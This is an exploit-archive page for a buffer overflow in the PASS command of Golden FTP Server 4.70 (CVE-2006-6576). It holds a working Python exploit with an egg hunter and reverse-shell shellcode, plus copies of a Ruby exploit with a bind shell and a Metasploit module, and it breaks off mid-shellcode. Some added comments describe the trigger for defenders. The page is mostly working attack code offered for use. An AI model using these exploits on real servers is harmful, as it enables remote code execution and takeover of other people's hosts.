ID PACKETSTORM:161711 Type packetstorm Reporter Craig Freyman Modified 2021-03-09T00:00:00
Description
`# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source ip address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable, and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections but will be unable
# to handle or process them in any way, so be careful.
#
#!/usr/local/bin/python3
# NOTE(review): the interpreter line above is not on line 1 of the file (the
# advisory header precedes it), so it is inert as a shebang.
#
# Proof-of-concept for CVE-2006-6576: Golden FTP Server 4.70 overflows on an
# over-long PASS argument sent after an anonymous USER. Every value below is
# fixed to the author's lab (addresses, the 545 length, the EIP value), which
# is why the header warns that it is unstable.
#
# Defender's view: the observable trigger is a single FTP control-channel
# line, "PASS " followed by about 534 bytes (545 minus the 11-character
# source address) that include non-printable bytes, sent right after
# "USER anonymous". The OpenVAS test quoted on this page
# (OPENVAS:1361412562310802024) exercises the same condition with a 500-byte
# PASS and then checks whether the service still answers; the vendor status
# recorded there is WillNotFix, so the mitigation is to retire or replace
# the product rather than wait for a patch.
from socket import *
# NOTE(review): sys is not referenced anywhere in this script.
import sys
# Your address forms part of the buffer length calculation
# (per the header note, the client's source address occupies part of the
# overflowed buffer, so the fill length shrinks with len(SOURCE)).
SOURCE = '192.168.1.1'
TARGET = '192.168.1.2'
# The connection is opened before the payload is assembled; the socket is
# never closed afterwards (no close() below).
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))
# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444
# Opaque msfvenom output for the command above: a Windows reverse shell that
# connects back to LHOST:LPORT. Treated here as a blob and not reviewed.
buf = b""
buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48"
buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71"
buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a"
buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38"
buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf"
buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7"
buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a"
buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9"
buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b"
buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a"
buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe"
buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc"
buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5"
buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83"
buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63"
buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16"
buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4"
buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde"
buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3"
buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e"
buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06"
buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc"
buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96"
buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1"
buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e"
buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6"
# Total length of the PASS argument as measured in the author's lab; it is
# not derived from anything the server sends back.
total_length = 545-len(SOURCE)
# 4-byte value intended to overwrite EIP; specific to the author's build and
# environment, hence the "unstable" warning in the header.
eip = b'\x7f\x79\x4c\x00'
hunter = b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset based on source ip
hunter += b'\xfd' # std ; set df flag so we search high to low
hunter += b'\xb8\x43\x42\x41\x40' # mov eax, 0x40414243 ; egg
hunter += b'\x89\xF7' # mov edi, esi ; start searching from esi
hunter += b'\x47' # inc edi
hunter += b'\x90' # nop
hunter += b'\x83\xC7\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b'\xaf' # scasd ; check for egg at edi
hunter += b'\x75\xfa' # short jnz -0x6 ; jump back to add edi, 0x3
hunter += b'\x83\xC7\x03' # add edi, 0x3
hunter += b'\xaf' # scasd
hunter += b'\x75\xfa' # short jnz -0x6
hunter += b'\x83\xC7\x1f' # add edi, 0x1f ; account for egg hunter
hunter += b'\xff\xe7' # jmp edi ; egg found, let's go!
hunter += b'\x90\x90\x90\x90\x90\x90' # padding ; nop slide to account for variable offset again
# Layout: hunter, shellcode, NOP fill, then the EIP value last, so the whole
# argument is total_length bytes. The fill count is
# total_length - 4 - len(hunter) - len(buf); Python turns a negative
# multiplier into b'', so if buf or hunter were ever longer the line would
# silently come out short — the script does not guard against that.
payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip
# Plain FTP exchange over the control channel: banner and USER reply are
# read and echoed, then the oversized PASS is sent. Replies are printed raw;
# nothing here parses result codes or checks what was actually sent.
s.send(b'USER anonymous\r\n')
print(s.recv(1024))
print(s.recv(1024))
s.send(b'PASS ' + payload + b'\r\n')
print(s.recv(1024))
s.send(b'QUIT\r\n')
print(s.recv(1024))
`
{"id": "PACKETSTORM:161711", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Golden FTP Server 4.70 Buffer Overflow", "description": "", "published": "2021-03-09T00:00:00", "modified": "2021-03-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/161711/Golden-FTP-Server-4.70-Buffer-Overflow.html", "reporter": "Craig Freyman", "references": [], "cvelist": ["CVE-2006-6576"], "lastseen": "2021-03-09T16:24:43", "viewCount": 49, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-6576"]}, {"type": "osvdb", "idList": ["OSVDB:35951"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103037", "OPENVAS:1361412562310802024"]}, {"type": "exploitdb", "idList": ["EDB-ID:49629", "EDB-ID:16036", "EDB-ID:17355"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FTP/GOLDENFTP_PASS_BOF"]}], "modified": "2021-03-09T16:24:43", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2021-03-09T16:24:43", "rev": 2}, "vulnersScore": 8.5}, "sourceHref": "https://packetstormsecurity.com/files/download/161711/goldenftp470-overflow.txt", "sourceData": "`# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2) \n# Author: 1F98D \n# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg) \n# Tested on Windows 10 (x64) \n# \n# A buffer overflow exists in GoldenFTP during the authentication process. \n# Note that the source ip address of the user performing the authentication \n# forms part of the buffer and as such must be accounted for when calculating \n# the appropriate offset. It should also be noted that the exploit is \n# rather unstable and if exploitation fails, GoldenFTP will be left in \n# a state where it will still accept connections, but it will be unable \n# to handle or process them in anyway, so be careful. 
\n# \n#!/usr/local/bin/python3 \n \nfrom socket import * \nimport sys \n \n# Your address forms part of the buffer length calculation \nSOURCE = '192.168.1.1' \nTARGET = '192.168.1.2' \ns = socket(AF_INET, SOCK_STREAM) \ns.connect((TARGET, 21)) \n \n# msfvenom -p windows/shell_reverse_tcp -f python -b '\\x00\\x0a\\x0d' LHOST=192.168.1.1 LPORT=4444 \nbuf = b\"\" \nbuf += b\"\\xba\\x1e\\xb6\\xaa\\x95\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x5d\\x29\" \nbuf += b\"\\xc9\\xb1\\x52\\x83\\xc5\\x04\\x31\\x55\\x0e\\x03\\x4b\\xb8\\x48\" \nbuf += b\"\\x60\\x8f\\x2c\\x0e\\x8b\\x6f\\xad\\x6f\\x05\\x8a\\x9c\\xaf\\x71\" \nbuf += b\"\\xdf\\x8f\\x1f\\xf1\\x8d\\x23\\xeb\\x57\\x25\\xb7\\x99\\x7f\\x4a\" \nbuf += b\"\\x70\\x17\\xa6\\x65\\x81\\x04\\x9a\\xe4\\x01\\x57\\xcf\\xc6\\x38\" \nbuf += b\"\\x98\\x02\\x07\\x7c\\xc5\\xef\\x55\\xd5\\x81\\x42\\x49\\x52\\xdf\" \nbuf += b\"\\x5e\\xe2\\x28\\xf1\\xe6\\x17\\xf8\\xf0\\xc7\\x86\\x72\\xab\\xc7\" \nbuf += b\"\\x29\\x56\\xc7\\x41\\x31\\xbb\\xe2\\x18\\xca\\x0f\\x98\\x9a\\x1a\" \nbuf += b\"\\x5e\\x61\\x30\\x63\\x6e\\x90\\x48\\xa4\\x49\\x4b\\x3f\\xdc\\xa9\" \nbuf += b\"\\xf6\\x38\\x1b\\xd3\\x2c\\xcc\\xbf\\x73\\xa6\\x76\\x1b\\x85\\x6b\" \nbuf += b\"\\xe0\\xe8\\x89\\xc0\\x66\\xb6\\x8d\\xd7\\xab\\xcd\\xaa\\x5c\\x4a\" \nbuf += b\"\\x01\\x3b\\x26\\x69\\x85\\x67\\xfc\\x10\\x9c\\xcd\\x53\\x2c\\xfe\" \nbuf += b\"\\xad\\x0c\\x88\\x75\\x43\\x58\\xa1\\xd4\\x0c\\xad\\x88\\xe6\\xcc\" \nbuf += b\"\\xb9\\x9b\\x95\\xfe\\x66\\x30\\x31\\xb3\\xef\\x9e\\xc6\\xb4\\xc5\" \nbuf += b\"\\x67\\x58\\x4b\\xe6\\x97\\x71\\x88\\xb2\\xc7\\xe9\\x39\\xbb\\x83\" \nbuf += b\"\\xe9\\xc6\\x6e\\x03\\xb9\\x68\\xc1\\xe4\\x69\\xc9\\xb1\\x8c\\x63\" \nbuf += b\"\\xc6\\xee\\xad\\x8c\\x0c\\x87\\x44\\x77\\xc7\\x68\\x30\\x76\\x16\" \nbuf += b\"\\x01\\x43\\x78\\x09\\x8d\\xca\\x9e\\x43\\x3d\\x9b\\x09\\xfc\\xa4\" \nbuf += b\"\\x86\\xc1\\x9d\\x29\\x1d\\xac\\x9e\\xa2\\x92\\x51\\x50\\x43\\xde\" \nbuf += b\"\\x41\\x05\\xa3\\x95\\x3b\\x80\\xbc\\x03\\x53\\x4e\\x2e\\xc8\\xa3\" \nbuf += 
b\"\\x19\\x53\\x47\\xf4\\x4e\\xa5\\x9e\\x90\\x62\\x9c\\x08\\x86\\x7e\" \nbuf += b\"\\x78\\x72\\x02\\xa5\\xb9\\x7d\\x8b\\x28\\x85\\x59\\x9b\\xf4\\x06\" \nbuf += b\"\\xe6\\xcf\\xa8\\x50\\xb0\\xb9\\x0e\\x0b\\x72\\x13\\xd9\\xe0\\xdc\" \nbuf += b\"\\xf3\\x9c\\xca\\xde\\x85\\xa0\\x06\\xa9\\x69\\x10\\xff\\xec\\x96\" \nbuf += b\"\\x9d\\x97\\xf8\\xef\\xc3\\x07\\x06\\x3a\\x40\\x37\\x4d\\x66\\xe1\" \nbuf += b\"\\xd0\\x08\\xf3\\xb3\\xbc\\xaa\\x2e\\xf7\\xb8\\x28\\xda\\x88\\x3e\" \nbuf += b\"\\x30\\xaf\\x8d\\x7b\\xf6\\x5c\\xfc\\x14\\x93\\x62\\x53\\x14\\xb6\" \n \ntotal_length = 545-len(SOURCE) \neip = b'\\x7f\\x79\\x4c\\x00' \nhunter = b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset base on source ip \nhunter += b'\\xfd' # std ; set df flag so we search high to low \nhunter += b'\\xb8\\x43\\x42\\x41\\x40' # mov eax, 0x40414243 ; egg \nhunter += b'\\x89\\xF7' # mov edi, esi ; start searching from esi \nhunter += b'\\x47' # inc edi \nhunter += b'\\x90' # nop \nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1 \nhunter += b'\\xaf' # scasd ; check for egg at edi \nhunter += b'\\x75\\xfa' # short jnz -0x6 ; jump back to add edi, 0x3 \nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3 \nhunter += b'\\xaf' # scasd \nhunter += b'\\x75\\xfa' # short jnz -0x6 \nhunter += b'\\x83\\xC7\\x1f' # add edi, 0x1f ; account for egg hunter \nhunter += b'\\xff\\xe7' # jmp edi ; egg found, let's go! \nhunter += b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset again \n \npayload = hunter + buf + b'\\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip \n \ns.send(b'USER anonymous\\r\\n') \nprint(s.recv(1024)) \nprint(s.recv(1024)) \ns.send(b'PASS ' + payload + b'\\r\\n') \nprint(s.recv(1024)) \ns.send(b'QUIT\\r\\n') \nprint(s.recv(1024)) \n \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-03-17T13:24:24", "description": "Heap-based buffer overflow in Golden FTP Server (goldenftpd) 1.92 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a long PASS command. NOTE: it was later reported that 4.70 is also affected. NOTE: the USER vector is already covered by CVE-2005-0634.", "edition": 6, "cvss3": {}, "published": "2006-12-15T19:28:00", "title": "CVE-2006-6576", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-6576"], "modified": "2021-03-16T19:23:00", "cpe": ["cpe:/a:goldenftpserver:golden_ftp_server:1.92"], "id": "CVE-2006-6576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-6576", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:goldenftpserver:golden_ftp_server:1.92:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T22:58:57", "description": "Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit. CVE-2006-6576. 
Remote exploit for windows platform", "published": "2011-01-23T00:00:00", "type": "exploitdb", "title": "Golden FTP Server 4.70 - PASS Command Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2011-01-23T00:00:00", "id": "EDB-ID:16036", "href": "https://www.exploit-db.com/exploits/16036/", "sourceData": "#GoldenFTP 4.70 PASS Exploit\r\n#Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)\r\n#Tested on XP SP3 \r\n#Vendor Contacted: 1/17/2011 (no response)\r\n#For this exploit to work correctly, you need to know the subnet that the server \r\n#is running on. You also need to make sure that \"show new connections\" is checked in the options.\r\n#The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.\r\n#528 is the offset when server running on 192.168.236.0 \r\n#533 is the offset when server running on 10.0.1.0 \r\n#530 is the offset when server running on 192.168.1.0 \r\n#531 is the offset when server running on 172.16.1.0 \r\n\r\nrequire 'net/ftp'\r\n\r\n#Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes\r\nshellcode = (\"\\x2b\\xc9\\xb1\\x56\\xba\\x96\\x70\\x11\\x9e\\xdb\\xd0\\xd9\\x74\\x24\" +\r\n\"\\xf4\\x58\\x31\\x50\\x10\\x03\\x50\\x10\\x83\\xe8\\xfc\\x74\\x85\\xed\" +\r\n\"\\x76\\xf1\\x66\\x0e\\x87\\x61\\xee\\xeb\\xb6\\xb3\\x94\\x78\\xea\\x03\" +\r\n\"\\xde\\x2d\\x07\\xe8\\xb2\\xc5\\x9c\\x9c\\x1a\\xe9\\x15\\x2a\\x7d\\xc4\" +\r\n\"\\xa6\\x9b\\x41\\x8a\\x65\\xba\\x3d\\xd1\\xb9\\x1c\\x7f\\x1a\\xcc\\x5d\" +\r\n\"\\xb8\\x47\\x3f\\x0f\\x11\\x03\\x92\\xbf\\x16\\x51\\x2f\\xbe\\xf8\\xdd\" +\r\n\"\\x0f\\xb8\\x7d\\x21\\xfb\\x72\\x7f\\x72\\x54\\x09\\x37\\x6a\\xde\\x55\" +\r\n\"\\xe8\\x8b\\x33\\x86\\xd4\\xc2\\x38\\x7c\\xae\\xd4\\xe8\\x4d\\x4f\\xe7\" +\r\n\"\\xd4\\x01\\x6e\\xc7\\xd8\\x58\\xb6\\xe0\\x02\\x2f\\xcc\\x12\\xbe\\x37\" +\r\n\"\\x17\\x68\\x64\\xb2\\x8a\\xca\\xef\\x64\\x6f\\xea\\x3c\\xf2\\xe4\\xe0\" 
+\r\n\"\\x89\\x71\\xa2\\xe4\\x0c\\x56\\xd8\\x11\\x84\\x59\\x0f\\x90\\xde\\x7d\" +\r\n\"\\x8b\\xf8\\x85\\x1c\\x8a\\xa4\\x68\\x21\\xcc\\x01\\xd4\\x87\\x86\\xa0\" +\r\n\"\\x01\\xb1\\xc4\\xac\\xe6\\x8f\\xf6\\x2c\\x61\\x98\\x85\\x1e\\x2e\\x32\" +\r\n\"\\x02\\x13\\xa7\\x9c\\xd5\\x54\\x92\\x58\\x49\\xab\\x1d\\x98\\x43\\x68\" +\r\n\"\\x49\\xc8\\xfb\\x59\\xf2\\x83\\xfb\\x66\\x27\\x03\\xac\\xc8\\x98\\xe3\" +\r\n\"\\x1c\\xa9\\x48\\x8b\\x76\\x26\\xb6\\xab\\x78\\xec\\xc1\\xec\\xb6\\xd4\" +\r\n\"\\x81\\x9a\\xba\\xea\\x34\\x06\\x32\\x0c\\x5c\\xa6\\x12\\x86\\xc9\\x04\" +\r\n\"\\x41\\x1f\\x6d\\x77\\xa3\\x33\\x26\\xef\\xfb\\x5d\\xf0\\x10\\xfc\\x4b\" +\r\n\"\\x52\\xbd\\x54\\x1c\\x21\\xad\\x60\\x3d\\x36\\xf8\\xc0\\x34\\x0e\\x6a\" +\r\n\"\\x9a\\x28\\xdc\\x0b\\x9b\\x60\\xb6\\xa8\\x0e\\xef\\x47\\xa7\\x32\\xb8\" +\r\n\"\\x10\\xe0\\x85\\xb1\\xf5\\x1c\\xbf\\x6b\\xe8\\xdd\\x59\\x53\\xa8\\x39\" +\r\n\"\\x9a\\x5a\\x30\\xcc\\xa6\\x78\\x22\\x08\\x26\\xc5\\x16\\xc4\\x71\\x93\" +\r\n\"\\xc0\\xa2\\x2b\\x55\\xbb\\x7c\\x87\\x3f\\x2b\\xf9\\xeb\\xff\\x2d\\x06\" +\r\n\"\\x26\\x76\\xd1\\xb6\\x9f\\xcf\\xed\\x76\\x48\\xd8\\x96\\x6b\\xe8\\x27\" +\r\n\"\\x4d\\x28\\x18\\x62\\xcc\\x18\\xb1\\x2b\\x84\\x19\\xdc\\xcb\\x72\\x5d\" +\r\n\"\\xd9\\x4f\\x77\\x1d\\x1e\\x4f\\xf2\\x18\\x5a\\xd7\\xee\\x50\\xf3\\xb2\" +\r\n\"\\x10\\xc7\\xf4\\x96\\x1b\")\r\n\r\nputs \"[*]This exploit requires knowledge of the local \\n[*]subnet the ftp server is running on.\"\r\nputs \"[*]It will not work unless it is one of these: \\n-->10.0.1.0\\n-->192.168.1.0\\n-->172.16.1.0\\n-->192.168.236.0\\n[*]If your subnet isn't listed, figure out the offset on your own.\"\r\nputs \"[*]Enter the IP of the GoldenFTP Server\"\r\nhost = gets.chomp \r\n\r\n#Get the subnet so we can figure out the offset\r\nputs \"Which subnet is the FTP server running on?\"\r\nputs \"1 --> 10.0.1.0\" \r\nputs \"2 --> 192.168.1.0\" \r\nputs \"3 --> 172.16.1.0\" \r\nputs \"4 --> 192.168.236.0\" \r\nsubnet = gets.chomp \r\n \r\njunk = \"\\x01\" + \"\\x90\" * 19\r\neip = 
\"\\x4e\\xae\\x45\\x7e\"\r\n\r\npadto529 = \"\\x90\" * 136\r\npadto527 = \"\\x90\" * 134\r\npadto526 = \"\\x90\" * 133\r\npadto524 = \"\\x90\" * 131\r\n \r\nif subnet ==\"1\"\r\n\tbuffer = junk + shellcode + padto529 + eip # buffer is 529 total bytes\r\nelsif subnet ==\"2\"\r\n\tbuffer = junk + shellcode + padto526 + eip # buffer is 526 total bytes\r\nelsif subnet ==\"3\"\r\n\tbuffer = junk + shellcode + padto527 + eip # buffer is 527 total bytes\r\nelsif subnet ==\"4\"\r\n\tbuffer = junk + shellcode + padto524 + eip # buffer is 524 total bytes\r\nend\r\n\r\nftp = Net::FTP.new(host)\r\n \r\nputs \"++ Connecting to target...\\n\"\r\n \r\nftp.login(user=\"anonymous\", passwd=(buffer)) \r\nftp.passive = true\r\n\r\nsleep(2)\r\n \r\nftp.close\r\n\r\nputs \"++ Connecting to target on port 4444....\\n\"\r\nsleep(2)\r\n\r\ncommand= \"telnet \"+ host +\" 4444\"\r\n \r\nsystem(command)\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16036/"}, {"lastseen": "2016-02-02T07:42:01", "description": "GoldenFTP PASS Stack Buffer Overflow. CVE-2006-6576. Remote exploit for windows platform", "published": "2011-06-02T00:00:00", "type": "exploitdb", "title": "Golden FTP 4.70 - PASS Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2011-06-02T00:00:00", "id": "EDB-ID:17355", "href": "https://www.exploit-db.com/exploits/17355/", "sourceData": "#\r\n# $Id: goldenftp_pass_bof.rb 12812 2011-06-02 01:10:22Z bannedit $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'GoldenFTP PASS Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Golden\r\n\t\t\t\tFTP service. This module uses the PASS command to trigger the overflow.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'bannedit' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12812 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'BID', '45957 '],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/16036/'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 350,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['win'],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'win',\r\n\t\t\t\t\t\t\t'Ret' => 0x00a93ca6,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t]\r\n\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 23 2011'))\r\n\tend\r\n\t\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\t\tprint_status(\"FTP Banner: #{banner}\".strip)\r\n\t\tif banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\"\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif datastore['RHOST'].length < 15\r\n\t\t\tpad = make_nops(1) * (15 - datastore['RHOST'].length)\r\n\t\tend\r\n\t\t\r\n\t\tsploit = make_nops(4) * 38\r\n\t\tsploit << 
payload.encoded\r\n\t\tsploit << pad\r\n\t\tsploit << make_nops(1) * (528 - sploit.length)\r\n\t\tsploit << [target.ret].pack('V')\r\n\r\n\t\tprint_status(\"Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}\")\r\n\t\tbegin\r\n\t\t\tconnect\r\n\t\t\tsend_user(\"anonymous\")\r\n\t\t\tsend_cmd(['PASS', sploit], false)\r\n\t\t\thandler\r\n\t\trescue EOFError\r\n\t\tend\r\n\tend\r\nend", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17355/"}, {"lastseen": "2021-03-09T16:31:52", "description": "", "published": "2021-03-09T00:00:00", "type": "exploitdb", "title": "Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2021-03-09T00:00:00", "id": "EDB-ID:49629", "href": "https://www.exploit-db.com/exploits/49629", "sourceData": "# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)\r\n# Author: 1F98D\r\n# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)\r\n# Tested on Windows 10 (x64)\r\n#\r\n# A buffer overflow exists in GoldenFTP during the authentication process.\r\n# Note that the source ip address of the user performing the authentication\r\n# forms part of the buffer and as such must be accounted for when calculating\r\n# the appropriate offset. 
It should also be noted that the exploit is\r\n# rather unstable and if exploitation fails, GoldenFTP will be left in\r\n# a state where it will still accept connections, but it will be unable\r\n# to handle or process them in anyway, so be careful.\r\n#\r\n#!/usr/local/bin/python3\r\n\r\nfrom socket import *\r\nimport sys\r\n\r\n# Your address forms part of the buffer length calculation\r\nSOURCE = '192.168.1.1'\r\nTARGET = '192.168.1.2'\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((TARGET, 21))\r\n\r\n# msfvenom -p windows/shell_reverse_tcp -f python -b '\\x00\\x0a\\x0d' LHOST=192.168.1.1 LPORT=4444\r\nbuf = b\"\"\r\nbuf += b\"\\xba\\x1e\\xb6\\xaa\\x95\\xda\\xc3\\xd9\\x74\\x24\\xf4\\x5d\\x29\"\r\nbuf += b\"\\xc9\\xb1\\x52\\x83\\xc5\\x04\\x31\\x55\\x0e\\x03\\x4b\\xb8\\x48\"\r\nbuf += b\"\\x60\\x8f\\x2c\\x0e\\x8b\\x6f\\xad\\x6f\\x05\\x8a\\x9c\\xaf\\x71\"\r\nbuf += b\"\\xdf\\x8f\\x1f\\xf1\\x8d\\x23\\xeb\\x57\\x25\\xb7\\x99\\x7f\\x4a\"\r\nbuf += b\"\\x70\\x17\\xa6\\x65\\x81\\x04\\x9a\\xe4\\x01\\x57\\xcf\\xc6\\x38\"\r\nbuf += b\"\\x98\\x02\\x07\\x7c\\xc5\\xef\\x55\\xd5\\x81\\x42\\x49\\x52\\xdf\"\r\nbuf += b\"\\x5e\\xe2\\x28\\xf1\\xe6\\x17\\xf8\\xf0\\xc7\\x86\\x72\\xab\\xc7\"\r\nbuf += b\"\\x29\\x56\\xc7\\x41\\x31\\xbb\\xe2\\x18\\xca\\x0f\\x98\\x9a\\x1a\"\r\nbuf += b\"\\x5e\\x61\\x30\\x63\\x6e\\x90\\x48\\xa4\\x49\\x4b\\x3f\\xdc\\xa9\"\r\nbuf += b\"\\xf6\\x38\\x1b\\xd3\\x2c\\xcc\\xbf\\x73\\xa6\\x76\\x1b\\x85\\x6b\"\r\nbuf += b\"\\xe0\\xe8\\x89\\xc0\\x66\\xb6\\x8d\\xd7\\xab\\xcd\\xaa\\x5c\\x4a\"\r\nbuf += 